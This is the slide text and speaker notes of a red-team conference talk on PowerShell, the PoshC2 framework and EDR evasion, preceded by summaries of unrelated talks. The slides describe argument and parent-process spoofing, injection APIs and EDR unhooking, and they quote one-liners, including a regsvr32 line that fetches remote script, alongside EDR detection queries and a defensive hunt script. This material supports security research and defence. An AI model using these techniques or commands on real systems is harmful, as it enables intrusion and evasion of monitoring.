Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM Classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.
Empowering red and blue teams with osint c0c0n 2017reconvillage
This talk will discuss Open Source Intelligence (OSINT) gathering tools and techniques that are highly useful and effective for both Blue teams and Red teams.
The document discusses the OWASP Top Ten project, which identifies the 10 most critical web application security risks. It provides an overview of OWASP, describes the Top 10 risks from 2013 and 2017, and explains changes between the two versions. For each risk, it gives a brief example and recommendations for prevention. The key topics covered are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging/monitoring.
Social Engineering the Windows Kernel by James ForshawShakacon
One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token which proves our identity to the system and let us access secured resources.
The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges or even compromise the kernel itself.
This presentation is about finding and then exploiting the incorrect handling of tokens in the windows kernel as well as first and third party drivers. Examples of serious vulnerabilities such as CVE-2015-0002 and CVE-2015-0062 will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
The document discusses various topics related to .NET Framework and C#. It provides definitions of concepts like framework, CLR, and comparisons between C# and other languages. It also includes code examples in C# and Java for calculating directory size recursively. Quizzes are included to test understanding.
Runtime Environment Of .Net Divya Rathore - Esha Yadav
The document discusses the .NET Framework and how it aims to unify programming models, simplify development, and introduce a common language runtime. It covers the design goals of the CLR including making development and deployment easier while providing a robust and secure execution environment. Examples are provided of how tasks like splitting a string that were complex in SQL can be simplified with the .NET Framework.
Production Debugging at Code Camp Philly - Brian Lyttle
This document provides an introduction to production debugging techniques. It discusses monitoring tools like Task Manager and Performance Monitor, debugging fundamentals like stack traces and crash dumps, protocol analysis, and remote debugging. The goal is to help developers effectively debug problems in production environments using tools that don't require a development workstation.
This document discusses techniques for hijacking the .NET framework and Just-In-Time compiler to monitor and analyze PowerShell commands at runtime. It provides background on PowerShell attacks, .NET fundamentals like assemblies and the JIT compiler, and methods for decompiling and manipulating .NET binaries. The goal is to allow PowerShell to run normally while analyzing obfuscated commands and remaining stealthy to avoid detection.
The document discusses various topics related to .NET and C# programming including the .NET framework, garbage collection, functional programming with F#, dynamic languages like IronPython and IronRuby, and best practices for .NET development. It provides examples of code in C#, F# and IronPython and asks several quiz questions to test understanding.
This document provides an overview of CodeIgniter, a PHP framework. It discusses CodeIgniter's architecture including MVC structure, controllers, models and views. It also covers CodeIgniter's core features like routing, libraries, helpers and security features. Comparisons are made between CodeIgniter and other PHP frameworks like CakePHP and Zend. A demo of CodeIgniter is planned.
Sebastien Thomas, System Architect at Coyote Amerique, gave a presentation on operator frameworks. His talk covered how Operator SDK can be used to create Kubernetes Operators with Go.
The document provides an overview of parallel development and Microsoft's investments in parallel computing technologies. It discusses the difficulty of writing parallel code and introduces some of Microsoft's tools and APIs to help developers write parallel and concurrent applications more easily, including the Task Parallel Library (TPL) and Parallel LINQ (PLINQ). It encourages developers to experiment with and provide feedback on these new parallel programming models and tools.
Beyond Breakpoints: A Tour of Dynamic Analysis - C4Media
Video and slides synchronized, mp3 and slide download available at URL http://bit.ly/2dXUUTG.
Nathan Taylor provides an introduction to the dynamic analysis research space, suggesting integrating these techniques into various internal tools. Filmed at qconnewyork.com.
Nathan Taylor is a software developer currently employed at Fastly, where he works on making the Web faster through high performance content delivery. Previous gigs have included hacking on low-level systems software such as Java runtimes at Twitter and, prior to that, the Xen virtual machine monitor in grad school.
How to write clean & testable code without losing your mind - Andreas Czakaj
If you create software that is to be developed continuously over several years you'll need a sustainable approach to code quality.
In our early days of AEM development, however, we used to struggle with code that is rigid, hard to test and full of LOG.debug calls.
In this talk I will share some development best practices we have found that really work in actual AEM based software, e.g. to achieve 100% code coverage and provide high confidence in the code base.
Spoiler alert: no new libraries, frameworks or tools are required - once you know the ideas, plain old TDD and the S.O.L.I.D. principles of Clean Code will do the trick.
by Andreas Czakaj, mensemedia Gesellschaft für Neue Medien mbH
Presented at the adaptTo() 2017 conference in Berlin (https://adapt.to/2017/en/schedule/how-to-write-clean---testable-code-without-losing-your-mind.html).
Presentation video can be found on YouTube (https://www.youtube.com/watch?v=JbJw5oN_zL4)
This document provides instructions for interpreting debug output on a Cisco router. The steps have a student configure debugging for IP routing on router R1. Interface Serial 0/0/0 between R1 and R2 is then configured with an IP address. Debug messages indicate the route is added but its state is initially false since the remote side is not yet configured. After fully configuring the local interface, debug output shows the interface state change to down until the remote side is also configured. The steps aim to demonstrate how debug output can provide insight into route states during router configuration.
.Net Hijacking to Defend PowerShell BSidesSF2017 - Amanda Rousseau
With the rise of attacks implementing PowerShell in recent months, there hasn’t been a solid solution for monitoring or prevention. Microsoft has released the AMSI solution for PowerShell v5; however, this can also be bypassed. This talk will focus on utilizing various stealthy runtime .NET hijacking techniques implemented for blue teamer defenses against PowerShell attacks. The paper will start with a light intro into .NET and PowerShell, then a deeper explanation of various attacker techniques, explained from the perspective of the blue teamer. Techniques include assembly modification, class and method injection, compiler profiling, and C based function hooking.
LogChaos: Challenges and Opportunities of Security Log Standardization - Anton Chuvakin
Abstract: The presentation will discuss how to bring order (in the form of standards!) to the chaotic world of logging. It will give a brief introduction to logs and logging and explain how and why logs grew so chaotic and disorganized. Next it will cover why log standards are sorely needed. It will offer a walkthrough that highlights the critical areas of log standardization. Past failed standards will be looked at and their lessons learned. Finally, current logging standard efforts will be presented briefly.
The document discusses various .NET debugging techniques, including:
1. The importance of debugging and the tools available for debugging .NET applications, such as Visual Studio and Debugging Tools for Windows.
2. Basic debugging tasks like setting breakpoints, stepping through code, and examining variables and call stacks.
3. Advanced techniques like debugging managed code, threads, and memory issues.
Debugging is an important part of the software development process that helps developers write more reliable code. There are several tools available for debugging .NET applications, including Visual Studio and Debugging Tools for Windows. Some basic debugging tasks involve setting breakpoints, stepping through code, examining variables and call stacks, and understanding memory usage and threads. Postmortem debugging techniques like dump file analysis can help debug problems that occur in production environments where live debugging is not possible.
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0 - Thomas Conté
This document summarizes the history and features of Microsoft's .NET Framework. It discusses the major releases from .NET 1.0 in 2002 through the current .NET 4.0. For each release, it highlights new capabilities like Windows Forms, ASP.NET, WPF, WCF, and LINQ. It also summarizes new areas in .NET 4.0 like parallel computing, the dynamic language runtime, and improvements to ADO.NET, Entity Framework, and Windows Workflow Foundation.
The document discusses new features in Visual Studio 2010 and .NET Framework 4.0, including an improved IDE, new language features in C# 4.0, and the Managed Extensibility Framework. It provides examples of using Parallel LINQ, named and optional parameters in C#, and asynchronous programming in F#.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022 - lior mazor
Our technology, work processes, and activities all depend on operating systems being safe and secure. Join us virtually for our upcoming "The Hacking Games - Operation System Vulnerabilities" Meetup to learn how hackers can compromise operating systems, bypass the antivirus protection layer and exploit Linux eBPF.
Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation.
SAP strikes back: Your SAP server now counter attacks. - Dmitry Iudin
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
2. Contents
Introductions
+ Whoami / Whoarewe
What is PowerShell
+ Understand what PowerShell is / key components
+ Is it DEAD?
Evolution of PoshC2
+ Release timeline & changes
EDR
+ History & challenges (offensive)
+ Future predictions
June 2019
3. @benpturner
+ Managing Principal Security Consultant @ Nettitude
+ Lead the Global Red Team Operation @ Nettitude
+ 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure)
+ 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST)
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
+ Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
+ Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg
+ 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
+ PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
Development Projects
+ Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ General day to day PowerShell / C# projects & security research
4. @b4ggio_su
+ Principal Security Consultant @ Nettitude
+ A Red Team Lead in the Global Red Team Operation @ Nettitude
+ 16 years in IT:
• 4 years as a sysadmin
• 4 years in a defensive role
• 8 years in an offensive role
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course
+ Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
5. @rbmaslen
+ Principal Security Consultant @ Nettitude
+ Red Teamer/Tools developer
+ 20 years in IT:
• 14 years as a developer (mainly C++, C#, HTML/JS)
• 6 years in an offensive role
+ CCT / CCSAM / OSCP / OSCE
Training / Talks
+ Thick Client Destruction (Steelcon 2017)
+ COM and the PowerThIEf (Steelcon 2018)
Development Projects
+ Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ PowerThIEf, SharpSocks, C# portscanner & ArpScan
6. Team Spicy Weasel
1st Place - 2018
+ labs.nettitude.com/blog/derbycon-2018-ctf-write-up
1st Place - 2017
+ labs.nettitude.com/blog/derbycon-2017-ctf-write-up
3rd Place - 2016
+ labs.nettitude.com/blog/derbycon-2016-ctf-write-up
7. What is PowerShell & is it DEAD?
1. The Microsoft binary - ”PowerShell.exe”
2. The DLL behind the binary - ”System.Management.Automation.Dll”
3. The folder - C:\Windows\System32\WindowsPowerShell\v1.0
4. The version? Is PSv2 dead, or only versions after 4 because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration?
https://www.youtube.com/watch?v=IYD_aiQtVaE
9. Evolution of PoshC2 2016 -> 2019
2016
June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
2017
Mar - v2.1 Removed C# GUI
May - PoshC2 Slack channel announced
July - PoshC2_Python Release
Oct – Reflective DLL / Shellcode Released
Nov - v3.0 Released with SharpSocks
2018
Feb - Readthedocs Documentation Released
July - v4.0 Released with Python Implant
2019
Jan - v4.8 Sharp Implant
Feb - Support for 2003/XP
June - SharpSocks Integration
13. Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
“process_name:powershell.exe”
2. Do a search across your estate and see how much this shows up…….
14. Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
“modload:system.management.automation.dll”
“modload:system.management.automation.ni.dll”
2. Filter out “powershell.exe”, and others……
3. Do a search across your estate and see how much this shows up…….
15. Defensive / Legacy Approach (Reactive)
Block powershell.exe on all endpoints
Only allow signed powershell scripts to be executed
Upgrade “powershell.exe” to v5.0 for greater visibility
Enable constrained mode to restrict language elements
Monitor for “System.Management.Automation.Dll” in processes
Integrate AMSI with AV vendor for early signature detection
Enable & Monitor ScriptBlock Logging for suspicious cmdlets
Enable & Monitor Transcript Logging for suspicious signatures
Enable & Monitor Module Logging for signatured modules
Modern Approach (Proactive)
19. Supposedly Used by APT 33
Suspected attribution: Iran
Target sectors: Aerospace, energy
Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.
• https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
• https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
• https://www.fireeye.com/current-threats/apt-groups.html#apt33
34. Avoidance – Tanium Signal Definition
image.path contains ‘system.management.automation’
AND process.path contains NOT ‘mscorsvw.exe’
AND process.path contains NOT ‘monitoringhost.exe’
AND process.path contains NOT ‘powershell.exe’
AND process.path contains NOT ‘powershell_ise.exe’
AND process.path contains NOT ‘sdiagnhost.exe’
AND process.path contains NOT ‘servermanager.exe’
AND process.path contains NOT ‘sqlps.exe’
AND process.path contains NOT ‘wsmprovhost.exe’
AND process.path contains NOT ‘Microsoft Azure AD Sync\Bin\miiserver.exe’
(Does require process tracing to be enabled in Tanium - quite heavy)
Warning - Not doing a hash checksum on the processes or their location
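As an added example (not code from the talk or from PoshC2), a PowerShell hunt that combines the modload query from slide 14 with the allowlist from the Tanium signal above, and closes the gap the warning points at by checking each allowlisted host's image path and Authenticode signature. It assumes Windows PowerShell 5.1 or later with rights to read other processes' module lists; the function and variable names are my own.

```powershell
# Added example (not from the talk or from PoshC2). Hunts for the PowerShell engine DLL
# loaded in processes other than the usual hosts, then checks each allowlisted host's
# image path and Authenticode signature, which the Tanium signal on the slide does not.
# Assumes Windows PowerShell 5.1+ with rights to read other processes' module lists.

# Image names from the slide's allowlist. Matching on name alone is the weakness the slide
# warns about, so allowlisted names still go through Test-HostImage below.
$KnownHosts = @(
    'mscorsvw.exe', 'monitoringhost.exe', 'powershell.exe', 'powershell_ise.exe',
    'sdiagnhost.exe', 'servermanager.exe', 'sqlps.exe', 'wsmprovhost.exe', 'miiserver.exe'
)

function Test-HostImage {
    # Returns $null when the image lives under Windows/Program Files and carries a valid
    # Microsoft signature; otherwise a short reason string for the analyst.
    param([string]$Path)

    if ([string]::IsNullOrEmpty($Path)) { return 'no image path (protected process?)' }

    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ }
    $inTrustedRoot = $false
    foreach ($root in $trustedRoots) {
        if ($Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
            $inTrustedRoot = $true
        }
    }
    if (-not $inTrustedRoot) { return "image outside Windows/Program Files: $Path" }

    $sig = Get-AuthenticodeSignature -FilePath $Path -ErrorAction SilentlyContinue
    if (-not $sig -or $sig.Status -ne 'Valid') {
        $status = if ($sig) { $sig.Status } else { 'unreadable' }
        return "Authenticode status: $status"
    }
    if ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        return "signed, but not by Microsoft: $($sig.SignerCertificate.Subject)"
    }
    return $null
}

function Get-AutomationHost {
    # One object per process with System.Management.Automation(.ni).dll loaded, plus a verdict:
    #   UnexpectedHost  - name not in the allowlist (the modload query from slide 14)
    #   SuspiciousKnown - allowlisted name, but the image fails the path/signature check
    #   KnownHost       - allowlisted name and the image checks out
    [CmdletBinding()]
    param([string[]]$AllowList = $KnownHosts)

    foreach ($proc in Get-Process -ErrorAction SilentlyContinue) {
        # Reading .Modules of a protected process or one from another session throws;
        # the child scope forces that into a catchable error so the process is skipped.
        try {
            $modules = @(& { $ErrorActionPreference = 'Stop'; $proc.Modules })
        } catch { continue }

        $engine = $modules | Where-Object {
            $_.ModuleName -match '^System\.Management\.Automation(\.ni)?\.dll$'
        } | Select-Object -First 1
        if (-not $engine) { continue }

        $image = "$($proc.ProcessName).exe"
        if ($AllowList -notcontains $image) {
            $verdict = 'UnexpectedHost'
            $reason  = 'engine DLL loaded in a non-standard host'
        } else {
            $reason  = Test-HostImage -Path $proc.Path
            $verdict = if ($reason) { 'SuspiciousKnown' } else { 'KnownHost' }
        }

        [PSCustomObject]@{
            Verdict = $verdict
            Process = $image
            PID     = $proc.Id
            Path    = $proc.Path
            Module  = $engine.FileName
            Reason  = $reason
        }
    }
}

# Usage: show only what is not a verified known host.
Get-AutomationHost | Where-Object { $_.Verdict -ne 'KnownHost' } | Format-Table -AutoSize
```

Run it from a 64-bit PowerShell so 64-bit module lists are readable; on a busy server it is a point-in-time snapshot, so pair it with the modload telemetry rather than replacing it.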
40. Process Argument Spoofing
1. Create a process suspended – Fake Arguments
2. Identify the PEB using NTQueryProcessInformation
3. Parse PEB and Commandline structure
4. Overwrite the Commandline arguments using
WriteProcessMemory – Real Arguments
5. Resume the process
41. Process Argument Spoofing
https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
42. Process Argument Spoofing – WHY?
Execution
Powershell One Liner
regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
wmic os get /FORMAT:”evil.xsl”
Lateral Movement
SC \\COMPUTERNAME stop "SERVICENAME"
wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%\Temp\batchfile.bat"
44. Partying With EDR
Migration Basics - Win API Calls:
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
http://deniable.org/misc/inject-all-the-things
However there are many ways to do the same thing, quick examples:
RtlCreateUserThread, NtCreateThreadEx, SetWindowsHookEx, QueueUserAPC
46. What is Hooking?
“In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook.” - Wikipedia
53. Bringing Back The Good Times
Re-Patch Memory to remove JMP to original code
Update the IAT table to point to the correct function
Create a stub – to carry out the same system calls
Free a number of API calls and use FreeLibrary to remove interfering DLLs
https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
57. COM Intro – just watch this
https://vimeo.com/214856542
58. Migrating with COM into IE
Spoke about this at Steelcon last year, has proved really handy
Has been used to get past some EDRs
Breaks the attribution between processes
59. The key to this? Junction folders
Junction folders, a technique leaked in the Vault 7 dumps
Forms the basis of SandboxEscaper's recent IE 11 sandbox escape
After adding some registry keys, allows code to be executed when you navigate to a folder
62. How can we use that
If we can get a reference to an IE window we can call
URL needs to be in the format shell:::{<GUID>}
https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/aa752094(v%3Dvs.85)
63. ShellWindows
Great COM class, allows you to enumerate all the currently open IE & Explorer windows and automate them
Guess what, you can then get them to navigate to a new location
https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx
64. Loading the DLL in IE, PowerShell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<# CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
#>
68. COM Callable Wrapper
Only use native DLLs? Thankfully not
Using CCWs (COM Callable Wrappers) we can write a .NET DLL and configure the registry keys so that when navigated to we can launch a .NET DLL. Use this as a COM Hijack if you want.
No time to go into CCW in depth but have a read of https://docs.microsoft.com/en-us/dotnet/framework/interop/com-callable-wrapper
.NET is started in IE and loads the DLL
We need a .NET assembly with a class that implements an interface and some registry keys
73. Setting up the .NET registry keys
Just make sure that you create or import the keys from an x64 application or use the explicit 64 bit key from the link below
https://docs.microsoft.com/en-us/windows/desktop/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
75. One last thing – remember this script
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<# CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
#>
79. EDR Summary
EDR is not a silver bullet
Does give incredible visibility to the Blue Team
Highly recommended as a complementary piece of the defensive strategy, but should not be solely relied on
Does not replace good people with experience
Constant Cat and Mouse game
80. Future Predictions
1. Over reliance on EDR, especially on user endpoints and not server land or non Windows Systems
2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data
3. Move to Zerotrust networks and MFA everywhere
4. Machine Learning – Investment into Process & Procedures
5. C2 frameworks moving to C++ base code – Could see MSF be revived for red teaming
6. All standard AV/EDR vendors adopting in memory scanning / AMSI
7. Windows 7 is EOL January 2020 – not a prediction but a reality
8. Windows 10 removal of .NET v2 – not a prediction but a reality
9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
81. Future Predictions
1. Over reliance on EDR, especially on endpoints and not server land (or unix really)
2. C2 frameworks moving to C++ base code – Could see MSF be revived for RT
3. We already have this level of capability and it's interesting what gets detected and what does not
4. All standard AV/EDR vendors adopting in memory scanning
5. Windows 7 is EOL January 2020 – not a prediction but a massive jump
6. Windows 10 removal of .NET v2
7. People going back to single executables running either C++ or C# code to evade lolbins signatures and
82. THANK YOU
Ben Turner @benpturner
Doug McLeod @b4ggio_su
Rob Maslen @rbmaslen
https://www.steelcon.info/training/
https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning
Editor's Notes
So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude.
As evident from the geeky title I’m a PowerShell & .NET enthusiast!
One of the main reasons I'm standing here (on top of being accepted to talk) is because over the last two years I've seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought, and I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
Some other places you may have seen us is at Derbycon, we’re quite a keen attender of this conference.
If you like CTFs, check out some of the blogs we wrote off the back of the cons.
It will be sad this year it's coming to an end – hopefully we can go out with a bang and maintain that 1st place position!
.NET reflection can unhook
So there has been a lot of talk about Powershell is dead and I wanted to share my small view of the world, with a slight focus on the evolution or PoshC2.
For those not aware, PoshC2 is a command and control framework that was created purely in PowerShell, designed to run on any Windows endpoint.
RAT – NOT Malware……
First of all created for learning purposes and evolved into much more, it really started out as 60 lines of code – this was including the logo!
And now is in the 10s of thousands of lines of code.
Let's think from an OPSEC perspective and show the start of PoshC2
Started out as a windows only c2 server and c2 implant written for only powershell….
Can anyone tell me what's wrong with this picture!
PAUSE………………………..
Probably more obvious, a malicious PowerShell process has started as the user Jason…
Let's dig a bit deeper and look at what the PowerShell command line arguments look like to start with….
This is the default PoshC2 PowerShell implant
Simple detections, anything running “powershell.exe” especially spawned from office, mshta, vbscript, jscript etc
How easy is it to spot this
Presence of the normal, abnormal presence of the????
Can you threat hunt across your estate?
NO!
It's just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
All throughout 2018, APT 33 was being tracked by FireEye
Amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2.
People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multi purposes
Attribution is most likely Iran
And typically used across the aerospace and energy sectors…
What’s really interesting here is that the IOCs (indicators of compromise) show the threat actor is using the defaults, e.g. PowerShell one liners, and is still having a huge amount of success
Explicitly a guy called Andrew from FireEye – @QW5kcmV3
The next big thing is the C# implant
This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
DEMO!!!!! IF WE HAVE TIME
Endpoint Detection and response is software that sends behavioural data to a central database for analysis
This is us when we run a process list and see an EDR system!!
But all is not lost and we have some example stories about challenges faced with different EDR solution
Behaviour based not just signature
We thought the blue team were watching an account which we needed to use. So we distracted them
We know carbon black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them
Enough to keep them busy
If the blue team have so much visibility, how can we throw them off the scent?
This is trickery and there are many things that can be done, but two that I'm going to lightly cover are Parent PID spoofing and Argument spoofing….deliberately to mess with process chaining.
STARTUPINFOEX
This structure contains an lpAttributeList
Update pid using UpdateProcThreadAttribute
Event Tracing for Windows – ETW
First screenshot shows the parent section process the same as the one below.
Second example shows that the parent process and the Process ID in the parent are different.
Process Argument Spoofing
First off, got to give credit to some of the initial people discussing this: Casey Smith and Will Burgess.
If you haven’t seen Will’s talk - Red Teaming in the EDR Age - then you should definitely go give it a watch.
Also covers a tool they created Gargoyle to hide malware in memory.
And, finally, programs that determine process arguments by reading the process PEB will see your real arguments and not our fake arguments.
Migration basics – a number of API calls – generally a basic example will take a handle on another process and call VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
These are not the only options available to us.
Inject all the things – is a nice wee project to assist in testing some of these calls – you should check it out
Instead of using CreateRemoteThread we can use, for example, RtlCreateUserThread – this bypassed the checks Symantec were looking for and we ended up with successful migration.
In short it is a technique that allows you to alter or augment the behaviour of the operating system.
Hook a function do bad things……. In old school gaming this is equivalent to hacking a game so that you cannot die.
Turns out the last option is super common
Kernel Patch Protection or PatchGuard scans the kernel on almost every level and will trigger a BSOD if a modification is detected. This includes the areas where the WinAPIs’ logic is carried out.
ZwCreateThreadEx
In Process Client
Hoang Bui
XPN
Many other examples – show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples – show these options to be rather easy.
Navigating to this folder means that code will be executed within explorer
We already have this level of capability and it's interesting what gets detected and what does not
Harder to pwn 2003/xp/nt
Palantir, AI, machine learning, Darktrace……
Microsoft ATA, ATP, Defender